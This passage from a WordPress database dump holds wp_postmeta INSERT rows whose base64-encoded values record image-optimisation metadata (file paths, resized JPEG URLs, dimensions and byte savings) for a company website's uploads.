GRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDc3LCJ0aW1lIjoxNDgzNTkwMDkyLCJpZCI6OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDE0LCJ0aW1lIjoxNDgzNTkwMDk2LCJpZCI6OTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTQtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQwNSwidGltZSI6MTQ4MzU5MDA5OSwiaWQiOjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NTksInRpbWUiOjE0ODM1OTAxMDMsImlkIjo5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTE0LCJ0aW1lIjoxNDgzNTkwMTA2LCJpZCI6OTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU2OCwidGltZSI6MTQ4MzU5MDEwOSwiaWQiOjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy00LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy00LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo2OTQsInRpbWUiOjE0ODM1OTAxMTMsImlkIjo5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTMxNCwidGltZSI6MTQ4MzU5MDExNywiaWQiOjkxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30351, 90, 'wpfc_optimisation_reduction', '1209349'); 
INSERT INTO `wp_postmeta` VALUES (30352, 90, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi5qcGciLCJ3aWR0aCI6NTkwNSwiaGVpZ2h0Ijo1OTA1LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTIuanBnIiwicmVkdWN0aW9uIjoxMjA5MzM1LCJ0aW1lIjoxNDgzNTkwMTI5LCJpZCI6IjkwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAxMzIsImlkIjo5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTItODAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAxMzYsImlkIjo5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTItNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAxNDAsImlkIjo5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi0xNjAweDE2MDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTItMTYwMHgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE0NSwiaWQiOjkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE0OCwiaWQiOjkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE1MSwiaWQiOjkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE1NSwiaWQiOjkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE1OCwiaWQiOjkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMi0yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMTYxLCJpZCI6OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAxNjUsImlkIjo5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE2OCwiaWQiOjkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMi0yLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMTcxLCJpZCI6OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAxNzUsImlkIjo5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0yLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTItNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMi02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDE3OCwiaWQiOjkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30353, 89, 'wpfc_optimisation_reduction', '3503'); 
INSERT INTO `wp_postmeta` VALUES (30354, 89, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLmpwZyIsIndpZHRoIjo0NTAsImhlaWdodCI6Mzg3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC0xLmpwZyIsInJlZHVjdGlvbiI6MzQ5NCwidGltZSI6MTQ4MzU5MDE4NSwiaWQiOiI4OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMTg4LCJpZCI6ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMTkwLCJpZCI6ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMTkyLCJpZCI6ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMTk0LCJpZCI6ODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TdXBwb3J0LTEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TdXBwb3J0LTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAxOTYsImlkIjo4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc